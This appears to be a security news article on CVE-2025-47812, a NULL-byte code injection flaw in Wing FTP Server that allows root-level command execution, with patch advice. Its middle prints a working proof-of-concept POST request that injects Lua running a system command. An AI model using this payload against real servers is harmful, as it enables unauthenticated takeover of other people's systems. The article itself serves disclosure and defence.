Critical Vulnerability in Wing FTP Server Allows Attackers to Seize Full Control

A severe security vulnerability, tracked as CVE-2025-47812, has been identified in Wing FTP Server versions up to and including 7.4.3.

This flaw, classified under CWE-94: Code Injection, carries a maximum CVSSv4 score of 10.0, indicating its criticality and ease of exploitation.

The vulnerability was discovered by security researcher Julien Ahrens from RCE Security and publicly disclosed on June 30, 2025.

Exploiting a NULL Byte Handling Flaw

Wing FTP Server is a widely used, cross-platform FTP solution supporting multiple protocols, including FTP, FTPS, HTTP, HTTPS, and SFTP.

Its web-based administration and flexible connectivity make it popular among enterprises and small businesses alike.

The vulnerability resides in the server’s handling of the /loginok.html endpoint.

Specifically, the server fails to properly sanitize the “username” parameter when it contains NULL bytes.

This oversight enables attackers to inject arbitrary Lua code into user session files.

If exploited, this allows an attacker to execute any command on the underlying system with the same privileges as the Wing FTP Server process—typically root on Linux or NT AUTHORITY/SYSTEM on Windows.

A proof-of-concept exploit demonstrates how an attacker can craft a malicious POST request to the vulnerable endpoint:

textPOST /loginok.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Length: 121

username=anonymous%00]]%0dlocal+h+%3d+io.popen("id")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=correct

This payload injects Lua code that executes the id command, demonstrating arbitrary command execution.

The risk is heightened if the server allows anonymous access, as it enables fully unauthenticated remote code execution.

Mitigation and Industry Response

Upon notification, the vendor promptly released Wing FTP Server version 7.4.4, which addresses this vulnerability.

All users are strongly urged to update immediately to mitigate the risk of exploitation.

RCE Security emphasizes the importance of continuous vulnerability management and rapid response.

Their approach involves continuous penetration testing, external attack surface management, and detailed, actionable reporting to ensure vulnerabilities like CVE-2025-47812 are identified and remediated before malicious actors can exploit them.

This incident underscores the critical need for robust input validation and regular software updates in all internet-facing services.

Organizations running Wing FTP Server should prioritize patching and review their server configurations, especially regarding anonymous access permissions, to minimize exposure.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates

The post Critical Vulnerability in Wing FTP Server Allows Attackers to Seize Full Control appeared first on Cyber Security News.